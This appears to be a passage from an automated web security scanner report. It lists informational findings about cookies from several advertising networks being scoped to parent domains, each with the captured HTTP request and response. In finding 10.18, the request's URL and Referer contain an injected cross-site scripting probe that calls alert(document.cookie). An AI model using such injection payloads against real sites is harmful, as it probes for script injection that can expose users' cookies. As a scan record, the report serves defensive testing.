Set-Cookie: ANON_ID=annFseoZdUQMo2HpivbwkXqrnTC3Gq4ZamyyXMNuQ5tpx4qkEqfbRrjjSdPNrBJTcUkZaZbfXx2aKlrIsUwBiFxVnWqtR1BUNFc109MAN5UxU7cik5WAjeajoV6F5D8yNswhqCd0j5AJcfQPB9oPXqfZcAqlKyrSZdNZdqVN0GeGG1mnmxdZaCyfIWG4u4vHZcvTyFdnGocxbW98c7xrVkIT71ESOa599qlUM0MVlGAAkV0iw1qCrwbsAlxlvN7mG9ZaC3B1mnPh9cF6n9yFxSBUJilqedSUgtbul8vLrIEED2ZdoKcrUcvy88MrWhkCUgeZdjZbWXjigr5veqGUVs7IZbxDJKj5sc91eSZduRHnnONQ0SdfwQYc9NpEMyEigm2opf5bOWMi29qaDy5syYHc0Wrtkc8JRS0ZbdPsnZdyBZb9ZdDp9L1ofFRP1Si0DW9iA0OfFS73A6dbMPE3nRkEeJ6fI1jS6V5AIH7X5CcFxWZalRmqJZbLfhuXaZbZdBR66yy7BUW2d0Spr55Vu4nuYfnGPiZbboRsZap1gaZdAlnBZarxZcU147PiJv6pUn6Ie2SECLSIJAdcrUwJL5jWeGaaOUcZd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:24 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.17. http://a.tribalfusion.com/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=246673&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1361549;type=landi756;cat=zipco403;ord=1;num=3596418555825.9487?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=arn7TwNZaiMt6memCmGwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bWalbfCPvRr5pHFJ2IiiqvUj8gL5UKMojsRtkyGv3iLgZdLhJWNtFwIaQqSDUhJXcolRQQftgBRpZbqFL3j1LmZaRLgOPqeE7bMdTEIGxtZdfM5WI7wWtsmYZaJOJkAibgqRMFJEdwIqaWU9WeZd8ntA03ww6cnyXOZbrqhfFE1rXFZdZb7tIQT1LDwroLnCrSBFdeNZb3ZbqSUdhKTLyZaa4ZcFGHeZbVThMfN8pnAYOeBZbsKVSfraRuvG30PErMalZa5

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=acn9yYr2PKMbuYn3Ycn4F5XpyFRGnTGDP2XlKn4flsYZaThCaY83G72Ttfc5CJViEZdoE1yd1Usq1ZbkfXpBHsFbApGkQGaGqZahSVsP8xUffgA1ZcJVp3fGOk7aFW4RXZdTdir1WbQPysXanCH1StdPbR7GqZauWGq8Y6I9JPro4uHhxESlZbSqZbJPt8EUtHZdhVXqPEBFUuZd4qdrX2qCIkoIyfEZaVUjyXqKZb6MKiReZdmBw1Zc3rThnZaB2yPbObsqku3t2yYFpeArR41kxK4jvH0GX38pfMAcc7tQmrno85a83b4DEKPAUQtQMl5tshRx5ZbGTn6TnNL6Eci6b9WavR62BX5N2WpqNp6pVCEj66XWGv45XZcl03UDwgInTwrFUORinp35JMdrGb; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:27:34 GMT;
Content-Type: text/html
Location: http://ad.yieldmanager.com/pixel?id=473373&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3612
Content-Length: 0
Connection: keep-alive


10.18. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90&p=4068932&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aEn51LRZdySO6IUMsYExOjh1oBlrc7bJ8Za02ysiMOWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57np199FZaw0mLWCH3AI5YJ0Wu36N55DyVPRBluxr7Bd5gBBXYkqRUe9UmE3CjxKLRFZcGvULfwumB2EKIn6QgbjSZcpCQcvO7WyZcQFe5mtDTRxdQZcIKWq8vfRhb6rjYSsPAM4QAsdVAed20A8B7YI0bHtTZatU7uo6f2JsWE7JrIZcnCEDooMfNC2sNZavfrtdRR9acdOQurFTy82SWn4nUGHFJMcjNnQ7dfKlmsY

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 14:14:39 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 660

document.write('<IFRAME src="http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36
...[SNIP]...

10.19. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 1767
Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 300px; height: 250px; border-width: 0px;">
<IFRAME SRC="http://ad.doubleclick.net/adi/N3671.CentroNetw
...[SNIP]...

10.20. http://ad.doubleclick.net/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3a9d/17/19e/*/x;234178444;1-0;0;58087481;3454-728/90;40401349/40419136/1;;~sscs=?http:/a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true
Set-Cookie: id=c653243310000d9|2782903/1009150/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 28 Jan 2011 16:41:38 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


10.21. http://ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6;sz=300x250;pc=[TPAS_ID];ord=1114886567?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.vw.com
Set-Cookie: id=c653243310000d9|1033942/1042959/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 28 Jan 2011 16:40:24 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


10.22. http://ad.doubleclick.net/jump/N6103.135388.BIZO/B5185769.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N6103.135388.BIZO/B5185769.6

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N6103.135388.BIZO/B5185769.6;sz=728x90;ord=7630304?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.supercutsfranchise.com
Set-Cookie: id=c653243310000d9|3050873/1051395/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 28 Jan 2011 16:40:37 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


10.23. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25206694&ahcid=78205&bimpd=21muvIbp10pUTWpgKeYXuBQpi4lGWgXGmwtEktp0bnhlzcEPCmKdzaOiN1w1JuG39EwjnwLbuWY9jCkZnpaQCWMdTXpPOHIA4Z3jWxQxlq4y0vr517NqPsPUS5E3qaEy91D0_KKhuTQf67OuV_F749IlnflTkyMzHOFj90yiivHk_Cifb2ytW8v8q_Ju-6U92ggx_bSQJBFgf_df8ZyZOeIlwU6iDh8JI6jOqp9q_Wu3L84a7I2NobirdMafsG3a4N_1k_LcbI1l_qw0hEgsW7ih2yQWaHy9ifTWvGQp8MHeKeZbcKBEFJ-wvfKan3_Boe6iWHbggg0Ypr7Atghsve1apqwxaDzB0mbr6PDH01f6uHcLMkCy-9027k5Tm6h9eWjcOJtBxwrIpab7eQoB2_vtezeQUtzKlS-ZQl0TjFHJLs4Ovk7WWqSFZMBZz0bEQl2pohKvINvcsARm5gxTHdmyu_XeZQTM0Y5XRGWekIB53lXvcwhi6qGeInxFIoFRfkbJ9D6YlCf5v80FPzVo5ZXIC94vkRX48casGySCH6SZxmuGhwjIl1JUdlPvihaCvfBz5xDsVEqchMpjM7fNhfDYOPZ0JXZ2uZFvjyYJf-F96K7oroatdbmzLY4GaezlgHULOjMY_qhRxKBMycAthKXuC9_2QhUUPMZBRYynaNwC3_JOWKiVz48eoEJe8dgOqRCcEuBcKxtaNJfsYHiQ1JAURjFg_cZiTZL5pFw8O7mjsZQyAQ6kVAwWSib4A4xDzHGAvnK92wWrpVqHjkZPWuoljc-5zAAoOxoBcBgje0LDTAGcK0LbrjjUGkdS7-oV&acp=35600B7D7485C869&rtbacid=55ed4e5e03bf8e5477cfcd0039923902d2e38a03 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sun, 30 Jan 2011 17:37:29 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=93BCq0WTCVMxF4AWDa_UBzGK2WVGmSebj4padkL3fXlh-L3XcPmT4hHXOQgApIlYCBsZxoRT6EzfAaBOxC9wKX8qYrC9FMnU5Q2wRAYDGypi9OYrtG-b0iAWL5Sg__z6OEq2AfRSlzTnZwWXTHks0QZw0eRZgpytzjhC6uPoirk_GMdu-y1E9O4PMUo2v2JwhEaBrxFtkyt_nkQhj928o37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJw1Kd0O3adRO10CesNfjCJaQrupC4PpJl2uCWF8C-Ug5JonU1AejF4MphQeZeUYshY_OeXGaHeEWZpxqUmyoO4ex_oV54IeDig5WzYLup3TcrrvyCQus6kPDo2a6SDFY3VUvCEsZdhQvkMaGDNXRUK74rP1CqKPcaX2koNpmFe4031p3A6UMJjebe8drcGsyS4Zsrl5itefLEEgtwe41cGh3HscxZqdV3tAgaup_BUiqfohDo4-tul6_WuD8j0eMjBk0vy7k2KCP9mAU3yIXJQsGDwUqNo5bwBfJavyMoCpX2Mtj8-j4P85vtqL-bgk4Jg88QTsvGp_uMnqAhaiuvUqwwwjl5KiXaen7PpuSxadNSx5tYcmc04sL2FZMw7u1ZPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6ZETO-MbYZA0ULyuOeS61QiyzaIjIkAm2O1xn3y2FwP0uPWnCg7Sts-m8PiyghybB3-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lA11f5HvjRM9LIAbnXs0Li7sXDmro6MsrnR0NjzyjJ0TpQgutzeDGCBRPRExuEdlCI6QrupC4PpJl2uCWF8C-Ug4Qr4-ZP_IMKsn4iIvW22r5067axWP77CNDdpZKPWLlS6EqzrlzsjMft3cRcjGnFvlTek5Lj_h7B1Bewly4iRmuVUvCEsZdhQvkMaGDNXRUK1IwqsroZj1oRmZCrinK3xPqzZ3gkHjNDLavV-i2IDmnytv5VAjvqHzGGgVc9TLFt3n4e5tgg6Ff1RgMWUU5h-ufohDo4-tul6_WuD8j0eMjcK-jZlyP6xG2V_Rmz3l2ScGDwUqNo5bwBfJavyMoCpUNbeNuKs3BuRiO6omJfcAAyR5nk0A4EbdYMkjxQX8Hhqwwwjl5KiXaen7PpuSxadOt4qBzD-0ra0lWqOClC2AdPveIf8j2XY661VgXz9vKr9po5kaVd3TDYjljHCv4vLrze8F97qvYfrL-2a4LxLlnvjmctIv6W_2bTZNXeWSbh689PoZZTdQXeDWLQpeFTD3-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukPU0BHKzioTSvOcuG_kdCGnpgcqiBETfVCgh6rOLqPGrWJcu-kcMstt6LYwLOO39vXw6eBg1etFWMwt9pDo4G3TjkMSE2urA6RQdUAWYeoJQpCu6kLg-kmXa4JYXwL5SDjce5WjiPia_4luRal1kY0Ua2L50HxvswuEv77HCRTvK41JwlocRM-1StCCQK60MTBqLSIeNNGU_XCDdEOyfgVlVS8ISxl2FC-QxoYM1dFQrVqtvVzrvJEYFzSRak7dnImakJ6Zxx4MaHG4qowJX52fHOfatzSZzKUl8ueBqzCaawyxPIuWXsEQ-0VWpUhNmBZ-iEOjj626Xr9a4PyPR4yPdkp0kF32F0VrZ-eD50kGIwYPBSo2jlvAF8lq_IygKlXvQQfU6ZavOfoVVJhgWQDUVQfWr6jEufoVuLrgwy8D2rDDCOXkqJdp6fs-m5LFp079CPUiQuMHA6LAYXd57kxI-94h_yPZdjrrVWBfP28qvnT-zGB9Xm2VMe1fLfEIlOjW7jR21XdBj9GT7hPGQI4m-OZy0i_pb_ZtNk1d5ZJuHZA0jg1fLTpYL91q-pX0OtP78DoTX-MltELREBCeeahn1EC3U97yx8tXGz
59qajUNpeot5-RPYUMY1qY3KivegYnicFnxFc-4ikme6wD3XHzXEqzQphnl7VhTGqxMDJsQpCu6kLg-kmXa4JYXwL5SDsgJkFWfRpPSyTdtKER-3fcbnCbJPSsHs0iOvX6zYZZ4XS3R0VP0f9ONcHVGJG5kfjUcKVDPX7zKRho6DeqmotVVS8ISxl2FC-QxoYM1dFQrENIylttcubl60fIAlgS379WGImt49pAB5RbCmhGeBVeEsNCVznntZWR3U7tjmpSZiMw4PMfLrYvwIJbxWoTsNZ-iEOjj626Xr9a4PyPR4yMyn697UAeI_iQ8xLHPyiNAwYPBSo2jlvAF8lq_IygKld75wEvezzIZgflpDl6XV7Bz61fwo7QtwGhL9V1Zrp3FrDDCOXkqJdp6fs-m5LFp0xYfxbijCuZYBnVL9kRyFz4-94h_yPZdjrrVWBfP28qvmOFU8nguKqpFLBdwoMdYmADyq9uBrjiMx6VvlWwNe_j33zBfQgc7CEV5jgCDdYtxgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA1ZO48tyrM-ITAlagqmc0qyWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyISYAbn3vt4ljb5jrj3mjbuV6ONoHWtyiE_pNTuBZXnxgi4LrnYI2YdVGKStQre4vEIuC652CNmHVRikrUK3uLxAmtS2Fa_lgnITmIRLj_AJR7yJIda-hMcXPq0_ADWUTce8iSHWvoTHFz6tPwA1lE3HvIkh1r6Exxc-rT8ANZRNz1jBTPQnGgalvM6qx6aEDqwMBGNyQcik-CF3_ES7LaN4Qoi_pxuEDAGD0pSAe0ShbJ44Ix0PS_yRZLx_j2HJpKyeOCMdD0v8kWS8f49hyaSko9jTov_tduoJ79WLRX3x8Jj6CPb9QD2jcY4QbTolZhp6t2QqCDEnVfKSI9Czqb8VkfhIMtBluaWa_TlPV12CVZH4SDLQZbmlmv05T1ddglWR-Egy0GW5pZr9OU9XXYJVkfhIMtBluaWa_TlPV12CZekQLzj8BqHl0xQJeRVWsdCB_o2VuswdXqYMMGNHfG3Qgf6NlbrMHV6mDDBjR3xt0IH-jZW6zB1epgwwY0d8bdCB_o2VuswdXqYMMGNHfG3UUrgidBzdBjh8B5MmfBQqlFK4InQc3QY4fAeTJnwUK